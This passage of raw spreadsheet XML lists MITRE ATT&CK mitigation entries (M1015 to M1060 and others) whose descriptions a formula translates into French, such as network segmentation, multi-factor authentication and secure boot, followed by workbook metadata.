        <v>1993</v>
      </c>
      <c r="D21" t="s">
        <v>1971</v>
      </c>
      <c r="E21" s="2" t="s">
        <v>2030</v>
      </c>
      <c r="F21" s="2" t="s">
        <v>2695</v>
      </c>
      <c r="G21" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Cette catégorie consiste à associer des techniques dont l’atténuation pourrait augmenter le risque de compromission et, par conséquent, l’atténuation n’est pas recommandée.
https://attack.mitre.org/mitigations/M1055</v>
      </c>
    </row>
    <row r="22" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A22" t="s">
        <v>2031</v>
      </c>
      <c r="B22" t="s">
        <v>2032</v>
      </c>
      <c r="C22" t="s">
        <v>1993</v>
      </c>
      <c r="D22" t="s">
        <v>1971</v>
      </c>
      <c r="E22" s="2" t="s">
        <v>2033</v>
      </c>
      <c r="F22" s="2" t="s">
        <v>2696</v>
      </c>
      <c r="G22" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Cette catégorie est utilisée pour toutes les activités d’atténuation applicables qui s’appliquent aux techniques mises en œuvre avant qu’un adversaire n’obtienne l’accès initial, telles que les techniques de reconnaissance et de développement des ressources.
https://attack.mitre.org/mitigations/M1056</v>
      </c>
    </row>
    <row r="23" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A23" t="s">
        <v>2034</v>
      </c>
      <c r="B23" t="s">
        <v>2035</v>
      </c>
      <c r="C23" t="s">
        <v>1977</v>
      </c>
      <c r="D23" t="s">
        <v>1971</v>
      </c>
      <c r="E23" s="2" t="s">
        <v>2036</v>
      </c>
      <c r="F23" s="2" t="s">
        <v>2035</v>
      </c>
      <c r="G23" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Interrompez et inspectez les sessions SSL/TLS pour rechercher des activités adverses dans le trafic Web chiffré.
https://attack.mitre.org/mitigations/M1020</v>
      </c>
    </row>
    <row r="24" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A24" t="s">
        <v>2037</v>
      </c>
      <c r="B24" t="s">
        <v>2038</v>
      </c>
      <c r="C24" t="s">
        <v>1977</v>
      </c>
      <c r="D24" t="s">
        <v>1971</v>
      </c>
      <c r="E24" s="2" t="s">
        <v>2039</v>
      </c>
      <c r="F24" s="2" t="s">
        <v>2697</v>
      </c>
      <c r="G24" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez des méthodes sécurisées pour démarrer un système et vérifier l’intégrité du système d’exploitation et des mécanismes de chargement.
https://attack.mitre.org/mitigations/M1046</v>
      </c>
    </row>
    <row r="25" spans="1:7" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A25" t="s">
        <v>2040</v>
      </c>
      <c r="B25" t="s">
        <v>2041</v>
      </c>
      <c r="C25" t="s">
        <v>1977</v>
      </c>
      <c r="D25" t="s">
        <v>1971</v>
      </c>
      <c r="E25" s="2" t="s">
        <v>2042</v>
      </c>
      <c r="F25" s="2" t="s">
        <v>2698</v>
      </c>
      <c r="G25" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Établissez des canaux de communication hors bande sécurisés pour assurer la continuité des communications critiques en cas d’incidents de sécurité, d’attaques d’intégrité des données ou de défaillances de communication au sein du réseau. La communication hors bande fait référence à l’utilisation d’un autre chemin de communication distinct qui ne dépend pas de l’infrastructure du réseau principal potentiellement compromise. Cette méthode peut inclure des applications de messagerie sécurisées, des lignes téléphoniques cryptées, des communications par satellite ou des systèmes de communication d’urgence dédiés. L’exploitation de ces canaux alternatifs réduit le risque que les adversaires interceptent, perturbent ou altèrent les communications sensibles et permet de coordonner une réponse efficace aux incidents. (Citation : TrustedSec OOB Communications)(Citation : Publication spéciale du NIST 800-53 Révision 5)
https://attack.mitre.org/mitigations/M1060</v>
      </c>
    </row>
    <row r="26" spans="1:7" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A26" t="s">
        <v>2043</v>
      </c>
      <c r="B26" t="s">
        <v>2044</v>
      </c>
      <c r="C26" t="s">
        <v>1977</v>
      </c>
      <c r="D26" t="s">
        <v>1971</v>
      </c>
      <c r="E26" s="2" t="s">
        <v>2045</v>
      </c>
      <c r="F26" s="2" t="s">
        <v>2699</v>
      </c>
      <c r="G26" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Concevez des sections du réseau pour isoler les systèmes, les fonctions ou les ressources critiques. Utilisez la segmentation physique et logique pour empêcher l’accès à des systèmes et des informations potentiellement sensibles. Utilisez une DMZ pour contenir tous les services Internet qui ne doivent pas être exposés à partir du réseau interne. Configurez des instances de cloud privé virtuel (VPC) distinctes pour isoler les systèmes cloud critiques.
https://attack.mitre.org/mitigations/M1030</v>
      </c>
    </row>
    <row r="27" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A27" t="s">
        <v>2046</v>
      </c>
      <c r="B27" t="s">
        <v>2047</v>
      </c>
      <c r="C27" t="s">
        <v>1977</v>
      </c>
      <c r="D27" t="s">
        <v>1971</v>
      </c>
      <c r="E27" s="2" t="s">
        <v>2048</v>
      </c>
      <c r="F27" s="2" t="s">
        <v>2700</v>
      </c>
      <c r="G27" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Un programme de renseignement sur les menaces aide une organisation à générer ses propres informations et à suivre les tendances afin d’établir les priorités défensives afin d’atténuer les risques.
https://attack.mitre.org/mitigations/M1019</v>
      </c>
    </row>
    <row r="28" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A28" t="s">
        <v>2049</v>
      </c>
      <c r="B28" t="s">
        <v>2050</v>
      </c>
      <c r="C28" t="s">
        <v>1977</v>
      </c>
      <c r="D28" t="s">
        <v>1971</v>
      </c>
      <c r="E28" s="2" t="s">
        <v>2051</v>
      </c>
      <c r="F28" s="2" t="s">
        <v>2701</v>
      </c>
      <c r="G28" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Définissez et appliquez des politiques de mot de passe sécurisées pour les comptes.
https://attack.mitre.org/mitigations/M1027</v>
      </c>
    </row>
    <row r="29" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A29" t="s">
        <v>2052</v>
      </c>
      <c r="B29" t="s">
        <v>2053</v>
      </c>
      <c r="C29" t="s">
        <v>1970</v>
      </c>
      <c r="D29" t="s">
        <v>1971</v>
      </c>
      <c r="E29" s="2" t="s">
        <v>2054</v>
      </c>
      <c r="F29" s="2" t="s">
        <v>2702</v>
      </c>
      <c r="G29" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez les fonctionnalités pour empêcher les comportements suspects de se produire sur les systèmes de terminaux. Il peut s’agir d’un processus suspect, d’un fichier, d’un appel d’API, etc.
https://attack.mitre.org/mitigations/M1040</v>
      </c>
    </row>
    <row r="30" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A30" t="s">
        <v>2055</v>
      </c>
      <c r="B30" t="s">
        <v>2056</v>
      </c>
      <c r="C30" t="s">
        <v>1977</v>
      </c>
      <c r="D30" t="s">
        <v>1971</v>
      </c>
      <c r="E30" s="2" t="s">
        <v>2057</v>
      </c>
      <c r="F30" s="2" t="s">
        <v>2703</v>
      </c>
      <c r="G30" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Gérez la création, la modification, l’utilisation et les autorisations associées aux comptes utilisateurs.
https://attack.mitre.org/mitigations/M1018</v>
      </c>
    </row>
    <row r="31" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A31" t="s">
        <v>2058</v>
      </c>
      <c r="B31" t="s">
        <v>2059</v>
      </c>
      <c r="C31" t="s">
        <v>1977</v>
      </c>
      <c r="D31" t="s">
        <v>1971</v>
      </c>
      <c r="E31" s="2" t="s">
        <v>2060</v>
      </c>
      <c r="F31" s="2" t="s">
        <v>2704</v>
      </c>
      <c r="G31" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Limitez l’accès en définissant des autorisations de répertoire et de fichier qui ne sont pas spécifiques aux utilisateurs ou aux comptes privilégiés.
https://attack.mitre.org/mitigations/M1022</v>
      </c>
    </row>
    <row r="32" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A32" t="s">
        <v>2061</v>
      </c>
      <c r="B32" t="s">
        <v>2062</v>
      </c>
      <c r="C32" t="s">
        <v>1977</v>
      </c>
      <c r="D32" t="s">
        <v>1971</v>
      </c>
      <c r="E32" s="2" t="s">
        <v>2063</v>
      </c>
      <c r="F32" s="2" t="s">
        <v>2705</v>
      </c>
      <c r="G32" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Gérez la création, la modification, l’utilisation et les autorisations associées aux comptes privilégiés, y compris SYSTEM et root.
https://attack.mitre.org/mitigations/M1026</v>
      </c>
    </row>
    <row r="33" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A33" t="s">
        <v>2064</v>
      </c>
      <c r="B33" t="s">
        <v>2065</v>
      </c>
      <c r="C33" t="s">
        <v>1977</v>
      </c>
      <c r="D33" t="s">
        <v>1971</v>
      </c>
      <c r="E33" s="2" t="s">
        <v>2066</v>
      </c>
      <c r="F33" s="2" t="s">
        <v>2706</v>
      </c>
      <c r="G33" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Restreindre la possibilité de modifier certaines ruches ou clés dans le registre Windows.
https://attack.mitre.org/mitigations/M1024</v>
      </c>
    </row>
    <row r="34" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A34" t="s">
        <v>2067</v>
      </c>
      <c r="B34" t="s">
        <v>2068</v>
      </c>
      <c r="C34" t="s">
        <v>1970</v>
      </c>
      <c r="D34" t="s">
        <v>1971</v>
      </c>
      <c r="E34" s="2" t="s">
        <v>2069</v>
      </c>
      <c r="F34" s="2" t="s">
        <v>2068</v>
      </c>
      <c r="G34" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez des signatures ou des heuristiques pour détecter les logiciels malveillants.
https://attack.mitre.org/mitigations/M1049</v>
      </c>
    </row>
    <row r="35" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A35" t="s">
        <v>2070</v>
      </c>
      <c r="B35" t="s">
        <v>2071</v>
      </c>
      <c r="C35" t="s">
        <v>1977</v>
      </c>
      <c r="D35" t="s">
        <v>1971</v>
      </c>
      <c r="E35" s="2" t="s">
        <v>2072</v>
      </c>
      <c r="F35" s="2" t="s">
        <v>2707</v>
      </c>
      <c r="G35" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utiliser deux preuves ou plus pour s’authentifier auprès d’un système ; tels que le nom d’utilisateur et le mot de passe en plus d’un jeton provenant d’une carte à puce physique ou d’un générateur de jetons.
https://attack.mitre.org/mitigations/M1032</v>
      </c>
    </row>
    <row r="36" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A36" t="s">
        <v>2073</v>
      </c>
      <c r="B36" t="s">
        <v>2074</v>
      </c>
      <c r="C36" t="s">
        <v>1977</v>
      </c>
      <c r="D36" t="s">
        <v>1971</v>
      </c>
      <c r="E36" s="2" t="s">
        <v>2075</v>
      </c>
      <c r="F36" s="2" t="s">
        <v>2708</v>
      </c>
      <c r="G36" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Mettre en œuvre des modifications de configuration du logiciel (autre que le système d’exploitation) pour atténuer les risques de sécurité associés au fonctionnement du logiciel.
https://attack.mitre.org/mitigations/M1054</v>
      </c>
    </row>
    <row r="37" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A37" t="s">
        <v>2076</v>
      </c>
      <c r="B37" t="s">
        <v>2077</v>
      </c>
      <c r="C37" t="s">
        <v>1977</v>
      </c>
      <c r="D37" t="s">
        <v>1971</v>
      </c>
      <c r="E37" s="2" t="s">
        <v>2078</v>
      </c>
      <c r="F37" s="2" t="s">
        <v>2709</v>
      </c>
      <c r="G37" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Limitez l’exécution de code à un environnement virtuel sur ou en transit vers un système de point de terminaison.
https://attack.mitre.org/mitigations/M1048</v>
      </c>
    </row>
    <row r="38" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A38" t="s">
        <v>2079</v>
      </c>
      <c r="B38" t="s">
        <v>2080</v>
      </c>
      <c r="C38" t="s">
        <v>1977</v>
      </c>
      <c r="D38" t="s">
        <v>1971</v>
      </c>
      <c r="E38" s="2" t="s">
        <v>2081</v>
      </c>
      <c r="F38" s="2" t="s">
        <v>2080</v>
      </c>
      <c r="G38" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Effectuer des audits ou des analyses des systèmes, des autorisations, des logiciels non sécurisés, des configurations non sécurisées, etc. pour identifier les faiblesses potentielles.
https://attack.mitre.org/mitigations/M1047</v>
      </c>
    </row>
    <row r="39" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A39" t="s">
        <v>2082</v>
      </c>
      <c r="B39" t="s">
        <v>2083</v>
      </c>
      <c r="C39" t="s">
        <v>1970</v>
      </c>
      <c r="D39" t="s">
        <v>1971</v>
      </c>
      <c r="E39" s="2" t="s">
        <v>2084</v>
      </c>
      <c r="F39" s="2" t="s">
        <v>2710</v>
      </c>
      <c r="G39" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez les capacités pour détecter et bloquer les conditions qui peuvent conduire à ou être indicatives d’un exploit logiciel.
https://attack.mitre.org/mitigations/M1050</v>
      </c>
    </row>
    <row r="40" spans="1:7" ht="144" x14ac:dyDescent="0.3">
      <c r="A40" t="s">
        <v>2085</v>
      </c>
      <c r="B40" t="s">
        <v>2086</v>
      </c>
      <c r="C40" t="s">
        <v>1977</v>
      </c>
      <c r="D40" t="s">
        <v>1971</v>
      </c>
      <c r="E40" s="2" t="s">
        <v>2087</v>
      </c>
      <c r="F40" s="2" t="s">
        <v>2711</v>
      </c>
      <c r="G40" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Mettez en œuvre des configurations Active Directory robustes à l’aide de stratégies de groupe pour contrôler l’accès et réduire la surface d’attaque. En voici quelques exemples précis :
* Configuration du compte : utilisez des comptes de domaine provisionnés plutôt que des comptes locaux pour tirer parti des capacités de contrôle et d’audit centralisées.
* Restrictions d’ouverture de session interactive : appliquez des stratégies de groupe qui interdisent les ouvertures de session interactives pour les comptes qui ne doivent pas accéder directement aux systèmes.
* Paramètres du bureau à distance : Limitez les connexions au bureau à distance aux comptes autorisés afin d’éviter toute utilisation abusive par des adversaires.
* Comptes administratifs dédiés : créez des comptes spécialisés à l’échelle du domaine qui sont limités aux ouvertures de session interactives, mais qui peuvent effectuer des tâches spécifiques telles que les installations ou l’accès au référentiel.
* Silos d’authentification : configurez les silos d’authentification dans Active Directory pour créer des zones d’accès avec des restrictions basées sur l’appartenance au groupe de sécurité global Utilisateurs protégés. Cette configuration renforce la sécurité en appliquant des protections supplémentaires aux comptes à haut risque, limitant ainsi leur exposition aux attaques potentielles.
https://attack.mitre.org/mitigations/M1015</v>
      </c>
    </row>
    <row r="41" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A41" t="s">
        <v>2088</v>
      </c>
      <c r="B41" t="s">
        <v>2089</v>
      </c>
      <c r="C41" t="s">
        <v>1977</v>
      </c>
      <c r="D41" t="s">
        <v>1971</v>
      </c>
      <c r="E41" s="2" t="s">
        <v>2090</v>
      </c>
      <c r="F41" s="2" t="s">
        <v>2712</v>
      </c>
      <c r="G41" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Effectuez régulièrement des mises à jour logicielles pour atténuer le risque d’exploitation.
https://attack.mitre.org/mitigations/M1051</v>
      </c>
    </row>
    <row r="42" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A42" t="s">
        <v>2091</v>
      </c>
      <c r="B42" t="s">
        <v>2092</v>
      </c>
      <c r="C42" t="s">
        <v>1977</v>
      </c>
      <c r="D42" t="s">
        <v>1971</v>
      </c>
      <c r="E42" s="2" t="s">
        <v>2093</v>
      </c>
      <c r="F42" s="2" t="s">
        <v>2713</v>
      </c>
      <c r="G42" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêchez l’utilisation abusive des mécanismes de chargement de bibliothèque dans le système d’exploitation et les logiciels pour charger du code non fiable en configurant des mécanismes de chargement de bibliothèque appropriés et en examinant les logiciels potentiellement vulnérables.
https://attack.mitre.org/mitigations/M1044</v>
      </c>
    </row>
    <row r="43" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A43" t="s">
        <v>2094</v>
      </c>
      <c r="B43" t="s">
        <v>2095</v>
      </c>
      <c r="C43" t="s">
        <v>1977</v>
      </c>
      <c r="D43" t="s">
        <v>1971</v>
      </c>
      <c r="E43" s="2" t="s">
        <v>2096</v>
      </c>
      <c r="F43" s="2" t="s">
        <v>2714</v>
      </c>
      <c r="G43" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Supprimez ou refusez l’accès aux logiciels inutiles et potentiellement vulnérables afin d’éviter les abus par des adversaires.
https://attack.mitre.org/mitigations/M1042</v>
      </c>
    </row>
    <row r="44" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A44" t="s">
        <v>2097</v>
      </c>
      <c r="B44" t="s">
        <v>2098</v>
      </c>
      <c r="C44" t="s">
        <v>1977</v>
      </c>
      <c r="D44" t="s">
        <v>1971</v>
      </c>
      <c r="E44" s="2" t="s">
        <v>2099</v>
      </c>
      <c r="F44" s="2" t="s">
        <v>2715</v>
      </c>
      <c r="G44" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Configurez les fonctionnalités liées à l’utilisation du compte, telles que les verrouillages de tentatives de connexion, les heures de connexion spécifiques, etc.
https://attack.mitre.org/mitigations/M1036</v>
      </c>
    </row>
    <row r="45" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A45" t="s">
        <v>2100</v>
      </c>
      <c r="B45" t="s">
        <v>2101</v>
      </c>
      <c r="C45" t="s">
        <v>1977</v>
      </c>
      <c r="D45" t="s">
        <v>1971</v>
      </c>
      <c r="E45" s="2" t="s">
        <v>2102</v>
      </c>
      <c r="F45" s="2" t="s">
        <v>2716</v>
      </c>
      <c r="G45" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Protégez les informations sensibles grâce à un cryptage fort.
https://attack.mitre.org/mitigations/M1041</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="2" type="noConversion"/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <ignoredErrors>
    <ignoredError sqref="F2:F45" calculatedColumn="1"/>
  </ignoredErrors>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5</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="5" baseType="lpstr">
      <vt:lpstr>library_meta</vt:lpstr>
      <vt:lpstr>Mitre threats_meta</vt:lpstr>
      <vt:lpstr>Mitre threats_content</vt:lpstr>
      <vt:lpstr>Mitre mitigations_meta</vt:lpstr>
      <vt:lpstr>Mitre mitigations_content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cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-04T13:51:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-04T15:59:52Z</dcterms:modified>
</cp:coreProperties>
</file>